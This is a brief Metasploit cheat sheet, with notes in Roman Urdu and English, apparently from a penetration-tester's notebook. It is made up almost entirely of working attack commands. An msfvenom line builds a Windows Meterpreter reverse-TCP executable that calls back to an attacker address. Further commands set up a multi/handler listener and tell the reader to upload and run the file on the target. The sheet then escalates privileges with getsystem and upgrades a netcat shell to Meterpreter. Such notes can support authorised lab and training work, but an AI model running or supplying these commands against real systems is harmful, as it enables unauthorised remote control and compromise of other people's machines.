📛Metasploit
How to Create exe Windows Reverse Shell with Metapreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f exe > shell-x64.exe
exe generate ho ge is command sa, then
msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST IP
set LPORT <port>
exploit
Exploit command sa listening mode pr a jaye ga
Phr exe ko upload kar k run karna ha
then Metapreter Session Receive ho jay ga
Command: getsystem
Command: Shell
Command: whoami
---------------------------------------------------------------
How to Upgrade Normal Shell to Metapreter Shell
msfconsole
use multi/handler
set LHOST IP
set LPORT 1337
exploit -j
netcat run karna session open ho jaye ga
Phir session ko upgrade karna meterpreter me
sessions -u 1
Upgrade ho jaye to
sessions 1
meterpreter me getsystem run kr k dakhna
---------------------------------------------------------------
Last updated